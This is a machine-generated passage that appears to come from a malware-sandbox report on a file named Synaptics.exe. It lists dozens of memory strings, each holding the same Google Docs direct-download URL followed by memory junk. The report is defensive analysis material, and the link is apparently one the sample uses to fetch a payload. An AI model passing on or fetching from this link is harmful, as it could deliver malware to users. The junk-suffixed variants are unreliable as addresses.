                          Source: Synaptics.exe, 00000003.00000002.2998989997.000000001DE0F000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2940590142.0000000005511000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2940590142.00000000055C4000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2995790141.000000001DBE6000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2995091873.000000001DB6F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadiyor
                          Source: Synaptics.exe, 00000003.00000002.2998989997.000000001DE0F000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2995790141.000000001DBE6000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2960427005.000000000E874000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2995091873.000000001DB6F000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2938078109.0000000000871000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadiyor.
                          Source: Synaptics.exe, 00000003.00000002.2943935308.0000000007630000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadiyor.$
                          Source: Synaptics.exe, 00000003.00000002.2998989997.000000001DE0F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadiyor.3
                          Source: Synaptics.exe, 00000003.00000002.2995790141.000000001DBE6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadiyor?
                          Source: Synaptics.exe, 00000003.00000002.2998989997.000000001DE0F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadiyorc
                          Source: Synaptics.exe, 00000003.00000002.2960427005.000000000E874000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadiyorj
                          Source: Synaptics.exe, 00000003.00000002.2995790141.000000001DBE6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadiyorn
                          Source: Synaptics.exe, 00000003.00000002.2940590142.0000000005511000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadiyors
                          Source: Synaptics.exe, 00000003.00000002.2959392597.000000000E7DE000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2946052719.000000000776D000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2995790141.000000001DBE6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadj
                          Source: Synaptics.exe, 00000003.00000002.2957759712.000000000E6C4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadj-
                          Source: Synaptics.exe, 00000003.00000002.2938078109.000000000085C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadj6r6mu
                          Source: Synaptics.exe, 00000003.00000002.2946052719.00000000077C3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadjBH
                          Source: Synaptics.exe, 00000003.00000002.2940590142.0000000005511000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2938078109.0000000000871000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadjecti
                          Source: Synaptics.exe, 00000003.00000002.2960427005.000000000E874000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadjecti4
                          Source: Synaptics.exe, 00000003.00000002.2943935308.0000000007630000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadjectiO
                          Source: Synaptics.exe, 00000003.00000002.2943935308.0000000007630000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadjectiy
                          Source: Synaptics.exe, 00000003.00000002.2940590142.00000000055C4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadjectiz.
                          Source: Synaptics.exe, 00000003.00000002.2998989997.000000001DE0F000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2943935308.0000000007630000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2962131638.000000000E9CA000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2994011286.000000001DA97000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2958564294.000000000E758000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2938078109.0000000000871000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadk
                          Source: Synaptics.exe, 00000003.00000002.2992581261.000000001DA4D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadk-
                          Source: Synaptics.exe, 00000003.00000002.2940590142.0000000005511000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadk8w
                          Source: Synaptics.exe, 00000003.00000002.2998989997.000000001DE0F000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2992281499.000000001D9E1000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2940590142.00000000055C4000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2962131638.000000000E9CA000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2997458148.000000001DD14000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2938078109.0000000000871000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2958564294.000000000E73E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadl
                          Source: Synaptics.exe, 00000003.00000002.2992581261.000000001DA4D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadl)
                          Source: Synaptics.exe, 00000003.00000002.2962131638.000000000E9CA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadle3pc
                          Source: Synaptics.exe, 00000003.00000002.2962131638.000000000E9CA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadle_r
                          Source: Synaptics.exe, 00000003.00000002.2946052719.000000000776D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadlelog
                          Source: Synaptics.exe, 00000003.00000002.2995790141.000000001DBE6000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2960427005.000000000E874000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2995091873.000000001DB6F000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2996750928.000000001DC5D000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2938078109.0000000000871000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadleme
                          Source: Synaptics.exe, 00000003.00000002.2998989997.000000001DE0F000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2995790141.000000001DBE6000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2995091873.000000001DB6F000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2996750928.000000001DC5D000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2938078109.0000000000871000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadleniy
                          Source: Synaptics.exe, 00000003.00000002.2995790141.000000001DBE6000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2938078109.0000000000871000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadleniyB
                          Source: Synaptics.exe, 00000003.00000002.2960427005.000000000E874000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadleniyH
                          Source: Synaptics.exe, 00000003.00000002.2940590142.0000000005511000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadleniyQ
                          Source: Synaptics.exe, 00000003.00000002.2998989997.000000001DE0F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadleniyu
                          Source: Synaptics.exe, 00000003.00000002.2962131638.000000000E9CA000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2958564294.000000000E758000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadll
                          Source: Synaptics.exe, 00000003.00000002.2940590142.0000000005511000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2940590142.00000000055C4000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2995790141.000000001DBE6000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2996750928.000000001DC5D000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2938078109.0000000000871000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadllem
                          Source: Synaptics.exe, 00000003.00000002.2940590142.00000000055C4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadllemM/
                          Source: Synaptics.exe, 00000003.00000002.2995790141.000000001DBE6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadllemP
                          Source: Synaptics.exe, 00000003.00000002.2995790141.000000001DBE6000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2995091873.000000001DB6F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadlleme
                          Source: Synaptics.exe, 00000003.00000002.2998989997.000000001DE0F000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2940590142.0000000005511000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2959392597.000000000E7DE000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2946052719.000000000776D000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2938078109.000000000082B000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2938078109.0000000000871000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadm
                          Source: Synaptics.exe, 00000003.00000002.2962131638.000000000E9CA000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2995790141.000000001DBE6000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2996750928.000000001DC5D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadm.
                          Source: Synaptics.exe, 00000003.00000002.2940590142.0000000005511000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadm/
                          Source: Synaptics.exe, 00000003.00000002.2946052719.00000000077C3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadmO
                          Source: Synaptics.exe, 00000003.00000002.2946052719.000000000776D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadmain
                          Source: Synaptics.exe, 00000003.00000002.2943935308.0000000007630000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadmax-width:390px;min-height
                          Source: Synaptics.exe, 00000003.00000002.2992281499.000000001D9E1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadmc
                          Source: Synaptics.exe, 00000003.00000002.2995790141.000000001DBE6000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2960427005.000000000E874000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2995091873.000000001DB6F000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2996750928.000000001DC5D000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2958564294.000000000E758000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2938078109.0000000000871000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadme
                          Source: Synaptics.exe, 00000003.00000002.2943935308.0000000007630000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2938078109.0000000000871000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadments
                          Source: Synaptics.exe, 00000003.00000002.2998989997.000000001DE0F000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2995790141.000000001DBE6000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2995091873.000000001DB6F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadmooo.
                          Source: Synaptics.exe, 00000003.00000002.2992281499.000000001D9E1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadm~
                          Source: Synaptics.exe, 00000003.00000002.2962131638.000000000E9CA000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2960427005.000000000E874000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2958564294.000000000E758000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadn
                          Source: Synaptics.exe, 00000003.00000002.2946052719.00000000077C3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadn4
                          Source: Synaptics.exe, 00000003.00000002.2946052719.00000000077C3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadnCL
                          Source: Synaptics.exe, 00000003.00000002.2946052719.00000000077C3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadnYN
                          Source: Synaptics.exe, 00000003.00000002.2940590142.0000000005511000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2960427005.000000000E874000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadname
                          Source: Synaptics.exe, 00000003.00000002.2962131638.000000000E9CA000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2958564294.000000000E758000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadnc
                          Source: Synaptics.exe, 00000003.00000002.2960427005.000000000E874000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2995091873.000000001DB6F000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2996750928.000000001DC5D000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2938078109.0000000000871000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadncell
                          Source: Synaptics.exe, 00000003.00000002.2940590142.0000000005511000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadncell(
                          Source: Synaptics.exe, 00000003.00000002.2998989997.000000001DE0F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadncell5
                          Source: Synaptics.exe, 00000003.00000002.2960427005.000000000E874000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadncellK
                          Source: Synaptics.exe, 00000003.00000002.2995790141.000000001DBE6000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2938078109.0000000000871000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadncellO
                          Source: Synaptics.exe, 00000003.00000002.2998989997.000000001DE0F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadncellr
                          Source: Synaptics.exe, 00000003.00000002.2995790141.000000001DBE6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadncellu
                          Source: Synaptics.exe, 00000003.00000002.2962131638.000000000E9CA000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2958564294.000000000E758000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadne
                          Source: Synaptics.exe, 00000003.00000002.2995790141.000000001DBE6000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2996750928.000000001DC5D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadnetl
                          Source: Synaptics.exe, 00000003.00000002.2998989997.000000001DE0F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadnetle
                          Source: Synaptics.exe, 00000003.00000002.2998989997.000000001DE0F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadnetlz
                          Source: Synaptics.exe, 00000003.00000002.2995790141.000000001DBE6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadng
                          Source: Synaptics.exe, 00000003.00000002.2995790141.000000001DBE6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadniyoS
                          Source: Synaptics.exe, 00000003.00000002.2998989997.000000001DE0F000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2940590142.0000000005511000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2995790141.000000001DBE6000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2995091873.000000001DB6F000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2996750928.000000001DC5D000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2938078109.0000000000871000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadniyor
                          Source: Synaptics.exe, 00000003.00000002.2960427005.000000000E874000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadniyor;
                          Source: Synaptics.exe, 00000003.00000002.2995790141.000000001DBE6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadniyord
                          Source: Synaptics.exe, 00000003.00000002.2998989997.000000001DE0F000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2996750928.000000001DC5D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadnt
                          Source: Synaptics.exe, 00000003.00000002.2946052719.000000000776D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadntent
                          Source: Synaptics.exe, 00000003.00000002.2998989997.000000001DE0F000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2940590142.0000000005511000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2940590142.00000000055C4000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2995790141.000000001DBE6000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2960427005.000000000E874000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2958564294.000000000E758000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloado
                          Source: Synaptics.exe, 00000003.00000002.2992581261.000000001DA4D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloado(
                          Source: Synaptics.exe, 00000003.00000002.2962131638.000000000E9CA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadoM
                          Source: Synaptics.exe, 00000003.00000002.2940590142.0000000005511000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadoa
                          Source: Synaptics.exe, 00000003.00000002.2940590142.0000000005511000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadoad
                          Source: Synaptics.exe, 00000003.00000002.2946052719.00000000077C3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadocookOY
                          Source: Synaptics.exe, 00000003.00000002.2998989997.000000001DE0F000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2995790141.000000001DBE6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadocume
                          Source: Synaptics.exe, 00000003.00000002.2940590142.0000000005511000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadod
                          Source: Synaptics.exe, 00000003.00000002.2946052719.00000000077C3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadogleZY
                          Source: Synaptics.exe, 00000003.00000002.2998989997.000000001DE0F000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2995790141.000000001DBE6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadolvin
                          Source: Synaptics.exe, 00000003.00000002.2946052719.00000000077C3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadom
                          Source: Synaptics.exe, 00000003.00000002.2998989997.000000001DE0F000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2995091873.000000001DB6F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadom.
                          Source: Synaptics.exe, 00000003.00000002.2940590142.0000000005511000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2940590142.00000000055C4000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2943935308.0000000007630000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadones
                          Source: Synaptics.exe, 00000003.00000002.2962131638.000000000E9CA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadoq
                          Source: Synaptics.exe, 00000003.00000002.2962131638.000000000E9CA000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2958564294.000000000E758000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloador
                          Source: Synaptics.exe, 00000003.00000002.2995790141.000000001DBE6000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2960427005.000000000E874000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2996750928.000000001DC5D000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2938078109.0000000000871000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloador..
                          Source: Synaptics.exe, 00000003.00000002.2998989997.000000001DE0F000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2996750928.000000001DC5D000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2958564294.000000000E758000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloador...
                          Source: Synaptics.exe, 00000003.00000002.2995790141.000000001DBE6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloador...L
